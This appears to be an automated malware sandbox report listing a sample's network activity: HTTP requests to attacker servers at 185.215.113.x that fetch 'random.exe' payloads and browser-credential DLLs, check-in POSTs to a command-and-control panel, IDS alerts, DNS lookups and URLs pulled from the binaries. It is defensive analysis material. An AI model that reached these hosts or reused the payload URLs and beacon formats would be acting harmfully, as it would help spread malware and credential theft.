7d 2c 2
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 36 32 38 30 38 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1062808001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /files/SQL_gulong/random.exe HTTP/1.1Host: 185.215.113.97
Source: global traffic	HTTP traffic detected: GET /ZhnSMEmOyBahvsfTCosA1738232489?argument=0 HTTP/1.1Host: home.fivegg5th.topAccept: /
Source: global traffic	HTTP traffic detected: POST /ZhnSMEmOyBahvsfTCosA1738232489 HTTP/1.1Host: home.fivegg5th.topAccept: /Content-Type: application/jsonContent-Length: 31Data Raw: 7b 20 22 69 64 31 22 3a 20 22 30 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d Data Ascii: { "id1": "0", "data": "Done1" }
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 36 32 38 30 39 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1062809001&unit=246122658369
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 152Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 41 42 35 32 37 37 33 42 32 35 43 38 32 44 31 32 46 43 30 37 44 42 32 33 39 42 39 36 44 41 30 34 34 35 31 36 36 45 46 37 41 37 44 33 35 42 31 45 37 35 30 38 36 34 32 39 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7AB52773B25C82D12FC07DB239B96DA0445166EF7A7D35B1E750864299
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 103.84.89.222:33791Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 152Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 41 42 35 32 37 37 33 42 32 35 43 38 32 44 31 32 46 43 30 37 44 42 32 33 39 42 39 36 44 41 30 34 34 35 31 36 36 45 46 37 41 37 44 33 35 42 31 45 37 35 30 38 36 34 32 39 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7AB52773B25C82D12FC07DB239B96DA0445166EF7A7D35B1E750864299
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s

Source: Joe Sandbox View	IP Address: 185.215.113.43 185.215.113.43
Source: Joe Sandbox View	IP Address: 185.215.113.97 185.215.113.97

Source: Joe Sandbox View

ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49707 -> 104.21.18.116:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49705 -> 104.21.18.116:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49704 -> 104.21.18.116:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49754 -> 104.21.18.116:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49743 -> 104.21.18.116:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49776 -> 104.21.18.116:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49765 -> 104.21.18.116:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49791 -> 104.21.18.116:443
Source: Network traffic	Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.10:50015 -> 185.215.113.115:80
Source: Network traffic	Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.10:49852 -> 185.215.113.115:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.10:50019 -> 185.215.113.97:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.10:50023 -> 185.215.113.97:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:50027 -> 104.21.79.9:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:50025 -> 104.21.79.9:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.10:50028 -> 185.215.113.97:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:50030 -> 104.21.79.9:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:50039 -> 104.21.79.9:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:50041 -> 104.21.79.9:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:50035 -> 104.21.79.9:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:50036 -> 104.21.79.9:443

Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 20.42.65.85
Source: unknown	TCP traffic detected without corresponding DNS query: 20.42.65.85
Source: unknown	TCP traffic detected without corresponding DNS query: 20.42.65.85
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 20.42.65.85
Source: unknown	TCP traffic detected without corresponding DNS query: 20.42.65.85
Source: unknown	TCP traffic detected without corresponding DNS query: 20.42.65.85
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16

Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe

Code function: 9_2_6CBFCC60 PR_Recv,

9_2_6CBFCC60

Source: global traffic	HTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CJe2yQEIo7bJAQipncoBCJr0ygEIlKHLAQiFoM0BCNy9zQEIkMrNAQi5ys0BCL/QzQEIxtHNAQi61M0BCMrWzQEIp9jNAQj5wNQVGPKYzQEYudLNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/ddljson?async=ntp:2 HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CJe2yQEIo7bJAQipncoBCJr0ygEIlKHLAQiFoM0BCNy9zQEIkMrNAQi5ys0BCL/QzQEIxtHNAQi61M0BCMrWzQEIp9jNAQj5wNQVGPKYzQEYudLNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /_/scs/abc-static/_/js/k=gapi.gapi.en.l2ZUC8FxqV8.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/rs=AHpOoo9xAAkaXO7Lqf7-9uTpZLtrkpWaXQ/cb=gapi.loaded_0 HTTP/1.1Host: apis.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /X-Client-Data: CJe2yQEIo7bJAQipncoBCJr0ygEIlKHLAQiFoM0BCLnKzQEIutTNARjymM0BGOuNpRc=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: /
Source: global traffic	HTTP traffic detected: GET /steam/random.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET /mine/random.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.115Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/sqlite3.dll HTTP/1.1Host: 185.215.113.115Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/freebl3.dll HTTP/1.1Host: 185.215.113.115Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/mozglue.dll HTTP/1.1Host: 185.215.113.115Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/msvcp140.dll HTTP/1.1Host: 185.215.113.115Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/nss3.dll HTTP/1.1Host: 185.215.113.115Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/softokn3.dll HTTP/1.1Host: 185.215.113.115Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/vcruntime140.dll HTTP/1.1Host: 185.215.113.115Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /files/martin1/random.exe HTTP/1.1Host: 185.215.113.97
Source: global traffic	HTTP traffic detected: GET /files/notfinancing/random.exe HTTP/1.1Host: 185.215.113.97
Source: global traffic	HTTP traffic detected: GET /files/SQL_gulong/random.exe HTTP/1.1Host: 185.215.113.97
Source: global traffic	HTTP traffic detected: GET /ZhnSMEmOyBahvsfTCosA1738232489?argument=0 HTTP/1.1Host: home.fivegg5th.topAccept: /

Source: global traffic	DNS traffic detected: DNS query: warlikedbeliev.org
Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: apis.google.com
Source: global traffic	DNS traffic detected: DNS query: play.google.com
Source: global traffic	DNS traffic detected: DNS query: httpbin.org
Source: global traffic	DNS traffic detected: DNS query: home.fivegg5th.top
Source: global traffic	DNS traffic detected: DNS query: rampnatleadk.click

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: warlikedbeliev.org

Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sun, 02 Feb 2025 06:55:34 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Frame-Options: SAMEORIGINReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aq4%2Bi1l6nkNXbq%2F%2F%2BJFhJpoit9Q9NZ2oW8LW1n0SgMGdBYZyY940lTKFzJRJwsB9qwvPxQklDpwe1ihbC8MCPFA0nf1vIU9CbH1jHaUhuq%2BAvZ6WrFSoknCW%2Bie60KQccH3HSAo%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 90b846c24bae8cb3-EWR
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sun, 02 Feb 2025 06:57:21 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Frame-Options: SAMEORIGINReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pAEJcIRtM%2F4K8WIDQp0RxY7ULt7J0lDzGcm8uOEIyBSSrl2FFBdyccOh7SRQgxn4942LRvVVw%2B7MATQxUAgBpETJXfmEEtoHdLrAlf%2BQ%2BJleMT%2BFNicW79gEKgxFwSwz0p47%2BNc%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 90b8495dcabb6a5c-EWR
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 NOT FOUNDServer: nginx/1.22.1Date: Sun, 02 Feb 2025 06:57:23 GMTContent-Type: text/html; charset=utf-8Content-Length: 207Connection: closeData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 NOT FOUNDServer: nginx/1.22.1Date: Sun, 02 Feb 2025 06:57:25 GMTContent-Type: text/html; charset=utf-8Content-Length: 207Connection: closeData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>

Source: d40ec5ca11.exe, 00000019.00000003.2290016247.00000000070B4000.00000004.00001000.00020000.00000000.sdmp, d40ec5ca11.exe, 00000019.00000002.2423554611.0000000000755000.00000040.00000001.01000000.0000000F.sdmp	String found in binary or memory: http://.css
Source: d40ec5ca11.exe, 00000019.00000003.2290016247.00000000070B4000.00000004.00001000.00020000.00000000.sdmp, d40ec5ca11.exe, 00000019.00000002.2423554611.0000000000755000.00000040.00000001.01000000.0000000F.sdmp	String found in binary or memory: http://.jpg
Source: ab13ed0cb0.exe, 0000001B.00000002.2545719370.000000000568F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://103.84.89.222:33791
Source: ab13ed0cb0.exe, 0000001B.00000002.2545719370.00000000055F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://103.84.89.222:33791/
Source: XAWR7RW45EPTK4VDBU7Q3V5ELG.exe, 00000009.00000002.1882078107.00000000005F7000.00000040.00000001.01000000.00000006.sdmp, XAWR7RW45EPTK4VDBU7Q3V5ELG.exe, 00000009.00000002.1883190413.000000000121E000.00000004.00000020.00020000.00000000.sdmp, XAWR7RW45EPTK4VDBU7Q3V5ELG.exe, 00000009.00000002.1882078107.0000000000514000.00000040.00000001.01000000.00000006.sdmp	String found in binary or memory: http://185.215.113.115
Source: XAWR7RW45EPTK4VDBU7Q3V5ELG.exe, 00000009.00000002.1883190413.000000000127A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.115/
Source: XAWR7RW45EPTK4VDBU7Q3V5ELG.exe, 00000009.00000002.1883190413.000000000127A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.115/68b591d6548ec281/freebl3.dll
Source: XAWR7RW45EPTK4VDBU7Q3V5ELG.exe, 00000009.00000002.1883190413.000000000127A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.115/68b591d6548ec281/mozglue.dll
Source: XAWR7RW45EPTK4VDBU7Q3V5ELG.exe, 00000009.00000002.1883190413.0000000001264000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.115/68b591d6548ec281/msvcp140.dll
Source: XAWR7RW45EPTK4VDBU7Q3V5ELG.exe, 00000009.00000002.1883190413.000000000127A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.115/68b591d6548ec281/nss3.dll
Source: XAWR7RW45EPTK4VDBU7Q3V5ELG.exe, 00000009.00000002.1883190413.0000000001264000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.115/68b591d6548ec281/softokn3.dll
Source: XAWR7RW45EPTK4VDBU7Q3V5ELG.exe, 00000009.00000002.1883190413.000000000127A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.115/68b591d6548ec281/sqlite3.dll
Source: XAWR7RW45EPTK4VDBU7Q3V5ELG.exe, 00000009.00000002.1883190413.000000000127A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.115/68b591d6548ec281/vcruntime140.dll
Source: XAWR7RW45EPTK4VDBU7Q3V5ELG.exe, 00000009.00000002.1883190413.000000000127A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.115/68b591d6548ec281/vcruntime140.dll)
Source: XAWR7RW45EPTK4VDBU7Q3V5ELG.exe, 00000009.00000002.1883190413.000000000127A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.115/68b591d6548ec281/vcruntime140.dll.
Source: XAWR7RW45EPTK4VDBU7Q3V5ELG.exe, 00000009.00000002.1883190413.000000000127A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.115/S
Source: XAWR7RW45EPTK4VDBU7Q3V5ELG.exe, 00000009.00000002.1883190413.000000000121E000.00000004.00000020.00020000.00000000.sdmp, XAWR7RW45EPTK4VDBU7Q3V5ELG.exe, 00000009.00000002.1882078107.0000000000514000.00000040.00000001.01000000.00000006.sdmp	String found in binary or memory: http://185.215.113.115/c4becf79229cb002.php
Source: XAWR7RW45EPTK4VDBU7Q3V5ELG.exe, 00000009.00000002.1883190413.00000000012A7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.115/c4becf79229cb002.php3
Source: XAWR7RW45EPTK4VDBU7Q3V5ELG.exe, 00000009.00000002.1888604381.000000000BE20000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.115/c4becf79229cb002.phpD6#;7u
Source: XAWR7RW45EPTK4VDBU7Q3V5ELG.exe, 00000009.00000002.1883190413.00000000012A7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.115/c4becf79229cb002.phpDs
Source: XAWR7RW45EPTK4VDBU7Q3V5ELG.exe, 00000009.00000002.1883190413.00000000012A7000.00000004.00000020.00020000.00000000.sdmp, XAWR7RW45EPTK4VDBU7Q3V5ELG.exe, 00000009.00000002.1883190413.0000000001264000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.115/c4becf79229cb002.phpH
Source: XAWR7RW45EPTK4VDBU7Q3V5ELG.exe, 00000009.00000002.1882078107.0000000000514000.00000040.00000001.01000000.00000006.sdmp	String found in binary or memory: http://185.215.113.115/c4becf79229cb002.phpS
Source: XAWR7RW45EPTK4VDBU7Q3V5ELG.exe, 00000009.00000002.1883190413.0000000001264000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.115/c4becf79229cb002.phpT
Source: XAWR7RW45EPTK4VDBU7Q3V5ELG.exe, 00000009.00000002.1882078107.0000000000514000.00000040.00000001.01000000.00000006.sdmp	String found in binary or memory: http://185.215.113.115/c4becf79229cb002.phpation
Source: XAWR7RW45EPTK4VDBU7Q3V5ELG.exe, 00000009.00000002.1883190413.000000000121E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.115/c4becf79229cb002.phpe
Source: XAWR7RW45EPTK4VDBU7Q3V5ELG.exe, 00000009.00000002.1882078107.00000000005F7000.00000040.00000001.01000000.00000006.sdmp	String found in binary or memory: http://185.215.113.115/c4becf79229cb002.phpion:
Source: XAWR7RW45EPTK4VDBU7Q3V5ELG.exe, 00000009.00000002.1882078107.00000000005F7000.00000040.00000001.01000000.00000006.sdmp	String found in binary or memory: http://185.215.113.115DAA
Source: XAWR7RW45EPTK4VDBU7Q3V5ELG.exe, 00000009.00000002.1882078107.0000000000514000.00000040.00000001.01000000.00000006.sdmp	String found in binary or memory: http://185.215.113.115ocal
Source: XAWR7RW45EPTK4VDBU7Q3V5ELG.exe, 00000009.00000002.1882078107.0000000000514000.00000040.00000001.01000000.00000006.sdmp	String found in binary or memory: http://185.215.113.115ocalMicrosoft
Source: L8ChrKrbqV.exe, 00000000.00000003.1479963019.000000000119D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/
Source: L8ChrKrbqV.exe, 00000000.00000003.1479963019.000000000119D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/&4B
Source: L8ChrKrbqV.exe, 00000000.00000003.1479426495.0000000001193000.00000004.00000020.00020000.00000000.sdmp, L8ChrKrbqV.exe, 00000000.00000003.1479963019.000000000119D000.00000004.00000020.00020000.00000000.sdmp, L8ChrKrbqV.exe, 00000000.00000003.1469372574.0000000001193000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/mine/random.exe
